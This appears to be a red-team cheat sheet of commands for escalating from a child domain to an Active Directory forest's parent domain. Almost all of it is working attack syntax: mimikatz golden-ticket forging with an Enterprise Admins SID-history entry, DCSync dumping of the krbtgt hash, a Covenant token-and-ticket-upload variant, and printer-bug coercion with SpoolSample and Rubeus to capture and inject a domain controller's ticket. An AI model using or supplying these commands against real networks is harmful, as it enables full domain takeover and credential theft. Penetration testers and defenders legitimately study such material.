Use only FQDN instead of IP after loading the ticket !

Be aware of the double issue:

SID-Hoping golden ticket

SID hopping only works for two domain within the same forest since according to Microsoft All domain trusts in an Active Directory forest are two-way, transitive trusts


Retrieve infos

SID to replace by 519: (New-Object System.Security.Principal.NTAccount("<domain>","krbtgt")).Translate([System.Security.Principal.SecurityIdentifier]).Value
krbtgt: dcsync <fqdn_child domain> <child_domain>\krbtgt
Get-DomainSID -Domain <fqdn_child_domain>
Get-NetComputer <DC_name>.<fqdn_cild_domain>

Forge and load ticket into memory

kerberos::golden /user:<ANY_CHILD_USER> /domain:<CHILD_DOMAIN> /sid:<CHILD_DOMAIN_SID> /krbtgt:<CHILD_DOMAIN_KRBTGT> /sids:<FULL_SID_PARENT_DOMAIN>-519 /ptt


lsadump::dcsync / /user:target\krbtgt
Covenant - defeating the double hop issue

Make a token for a user in the compromised domain

MakeToken <user> <domain> '' 9

Forge the ticket

kerberos::golden /user:<ANY_CHILD_USER> /domain:<CHILD_DOMAIN> /sid:<CHILD_DOMAIN_SID> /krbtgt:<CHILD_DOMAIN_KRBTGT> /sids:<FULL_SID_PARENT_DOMAIN>-519 /export
echo "<B64>" | base64 -d > ticket.kirbi

Upload the ticket and inject it into memory

upload ticket.kirbi
Rubeus renew /ticket:ticket.kirbi /ptt


lsadump::dcsync / /user:target\krbtgt

Printer bug

For the illustration (to make a link between both commands), the target DC is named dc02

Retrieve infos

powershell Get-DomainComputer -Domain <>
.\Rubeus.exe monitor /interval:5 /filteruser:dc02$
.\SpoolSample_v4.5_x64.exe <> <>
cat tmp.b64 | tr -d '      ' | tr -d '\n' > ticket.b64
Rubeus.exe ptt /ticket:<b64>
lsadump::dcsync /domain:<> /user:<target>\krbtgt